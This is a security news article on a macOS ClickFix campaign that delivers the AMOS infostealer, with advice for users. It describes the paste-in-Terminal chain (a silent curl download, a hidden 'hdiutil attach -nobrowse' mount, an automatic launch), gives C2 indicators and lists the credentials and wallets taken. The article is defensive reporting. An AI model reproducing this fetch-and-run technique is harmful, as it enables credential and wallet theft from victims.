A new ClickFix variant is going after macOS, and the clever part is that most of the dirty work runs through tools already shipped with the system. Researchers at Unit 42 (Palo Alto Networks) documented the campaign, which ends with Atomic macOS Stealer, better known as AMOS, on the victim’s machine.
How the trick works
It starts with a fake page that mimics a CAPTCHA check. Instead of ticking the usual box, the site tells you to open Terminal and paste a command to “complete verification.” That command is the trap.
What you run downloads a DMG file with curl using the -fsSL flags (quiet mode, no progress bar, no messages), saves it to /tmp under a random name, and then runs:
hdiutil attach -nobrowseThe -nobrowse flag mounts the disk image without showing it in Finder, so no new volume appears on the desktop or in the sidebar. The script walks up to three directory levels inside the image looking for a .app or .pkg, and once it finds one, it launches it with the macOS open command. Fully automatic, no further clicks from you.
In the analyzed case, the DMG was named s.01M0td.dmg and contained NNApp.app, a self-signed bundle. The command-and-control infrastructure included the domain svs-verificationdate[.]beer and the IP 196.251.107[.]171.
What AMOS steals
The payload is Atomic macOS Stealer, a hungry commercial infostealer. According to the analysis, it grabs:
- Credentials from eight Chromium-based browsers: Chrome, Edge, Brave, Opera, Arc, Vivaldi, CocCoc and Yandex.
- Data from Firefox-derived browsers: LibreWolf, SeaMonkey, Tor Browser, Waterfox and Zen Browser.
- Cryptocurrency wallets: Exodus, Electrum, Atomic Wallet, Wasabi, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance, Dogecoin and TonKeeper.
- Telegram Desktop and Discord data.
- Apple Keychain databases and Safari cookies.
- User documents in PDF, TXT and RTF format.
One detail stings if you hold crypto: AMOS replaces legitimate installs of Ledger Live and Trezor Suite with tampered versions built to drain hardware wallets.
Who it affects and what to do
There is no CVE here and no specific macOS bug to patch. The attack doesn’t exploit a flaw in the OS, it exploits the person at the keyboard. curl, hdiutil and open are normal, necessary utilities; the trouble is running them with arguments you don’t understand because a website told you to.
The fix is plain common sense and it holds up on its own: be suspicious any time a site asks you to open Terminal and paste a command. A real CAPTCHA never needs that. If you don’t fully understand what a command does, don’t run it. And if you use Ledger Live or Trezor Suite, download them only from the official sites and check that your install hasn’t been swapped out.
For a refresher on the affected system, see the macOS page with its version and support details.
Source
New macOS ClickFix attack silently mounts DMGs to push infostealer — BleepingComputer